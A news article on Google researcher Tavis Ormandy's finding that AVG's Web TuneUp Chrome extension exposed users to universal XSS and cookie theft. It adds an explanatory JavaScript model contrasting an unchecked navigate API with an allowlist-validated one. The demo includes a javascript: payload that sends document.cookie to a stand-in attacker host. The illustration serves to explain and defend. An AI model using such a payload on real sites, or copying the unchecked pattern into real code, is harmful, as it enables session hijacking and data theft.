AVG's Web TuneUp Chrome add-on poses security risk

The add-on disables security features in the Chrome browser that are designed to stop personal data leaking to other websites

Google has uncovered a vulnerability in AVG's Web TuneUp software, a product specifically built to safeguard users against hidden threats.

The flaw was uncovered by Tavis Ormandy, who works on Google's security team. He explained that the software force-installs an extension into the Chrome browser without asking the user's permission.


In doing so, the extension could expose the user's personal details and browsing history to criminals trawling the web for such data. The code could also let attackers read victims' email and spy on their other online activity, he said.

"This extension adds numerous JavaScript APIs to chrome, apparently so that they can hijack search settings and the new tab page," Ormandy wrote in the bug report.

"The installation process is quite complicated so that they can bypass the chrome malware checks, which specifically try to stop abuse of the extension API."

He added: "Anyway, many of the APIs are broken, the attached exploit steals cookies from avg.com. It also exposes browsing history and other personal data to the internet, I wouldn't be surprised if it's possible to turn this into arbitrary code execution."

After discovering the problem, Ormandy wrote to AVG highlighting the issue and advising the company to fix it immediately.


"My concern is that your security software is disabling web security for nine million Chrome users, apparently so that you can hijack search settings and the new tab page," he wrote.

"There are multiple obvious attacks possible, for example, here is a trivial universal xss in the 'navigate' API that can allow any website to execute script in the context of any other domain. For example, attacker.com can read email from mail.google.com, or corp.avg.com, or whatever else. I hope the severity of this issue is clear to you, fixing it should be your highest priority."

AVG responded by thanking Google for discovering the flaw and saying it had fixed the issue, but Google then replied that AVG's change had not stopped Web TuneUp from auto-installing itself as a Chrome extension.
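The universal XSS Ormandy describes is the consequence of a privileged "navigate" API trusting whatever URL the calling page hands it. The block below is an added illustration written for this article; it is not AVG's extension code, Ormandy's exploit, or Google's analysis, and the actual internals of Web TuneUp are not on this page. It models such an API in plain JavaScript: the unchecked variant forwards a caller-supplied URL straight to a tab-navigation primitive, so a javascript: URL runs in whatever origin the tab currently shows (the cross-origin script execution in the quote), while the hardened variant parses the URL first and allows only http(s) destinations, optionally restricted to an allowlist of hosts. The tab model, the cookie-stealing payload, the hostnames mail.example and attacker.example, and all function names are constructed for the example.

```javascript
// Added illustration (not AVG's or Google's code). Models an extension API
// that lets web pages navigate the current tab, and shows why the URL must
// be validated before it reaches a navigation primitive.

// Constructed stand-in for a browser tab: its current origin plus a log of
// what each navigation request actually did.
function makeTab(origin) {
  return { origin, navigations: [] };
}

// Constructed model of tab navigation. A javascript: URL evaluates in the
// tab's *current* origin; any other URL replaces the origin with its own.
function tabNavigate(tab, url) {
  if (url.trim().toLowerCase().startsWith("javascript:")) {
    tab.navigations.push({ kind: "script-in-origin", origin: tab.origin });
  } else {
    tab.origin = new URL(url).origin;
    tab.navigations.push({ kind: "load", origin: tab.origin });
  }
}

// Weak variant: trusts the calling page completely. Any site that can reach
// this API can run script in the origin the tab is currently showing.
function navigateUnchecked(tab, requestedUrl) {
  tabNavigate(tab, requestedUrl);
  return true;
}

// Hardened check: parse with the WHATWG URL parser (relative and malformed
// input throws), then accept only http/https, and only listed hosts when an
// allowlist is supplied. Exact hostname match defeats suffix tricks such as
// mail.example.attacker.example.
function isSafeNavigationTarget(requestedUrl, allowedHosts = null) {
  let parsed;
  try {
    parsed = new URL(requestedUrl);
  } catch {
    return false;
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return false;
  if (allowedHosts && !allowedHosts.includes(parsed.hostname)) return false;
  return true;
}

// Hardened variant of the API: refuse before touching the tab.
function navigateChecked(tab, requestedUrl, allowedHosts = null) {
  if (!isSafeNavigationTarget(requestedUrl, allowedHosts)) return false;
  tabNavigate(tab, requestedUrl);
  return true;
}

// Worked scenario (constructed): a page on attacker.example calls the API
// while the tab is showing mail.example, trying to exfiltrate its cookies.
function demo() {
  const payload =
    "javascript:fetch('https://attacker.example/?c=' + document.cookie)";
  const allowlist = ["mail.example"];

  const unchecked = makeTab("https://mail.example");
  navigateUnchecked(unchecked, payload); // script runs as mail.example

  const checked = makeTab("https://mail.example");
  navigateChecked(checked, payload, allowlist);                       // rejected: scheme
  navigateChecked(checked, "data:text/html,<script>1</script>", allowlist); // rejected: scheme
  navigateChecked(checked, "https://attacker.example/", allowlist);   // rejected: host
  navigateChecked(checked, "https://mail.example/inbox", allowlist);  // allowed

  return { unchecked: unchecked.navigations, checked: checked.navigations };
}
```

Running demo() shows the difference directly: the unchecked tab logs a script execution in the mail.example origin, while the checked tab logs only the single allowed load. The hardened check deliberately does not try to blocklist dangerous schemes; it allowlists the two it intends to support, which is the robust direction for any privileged API that accepts URLs from untrusted pages.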
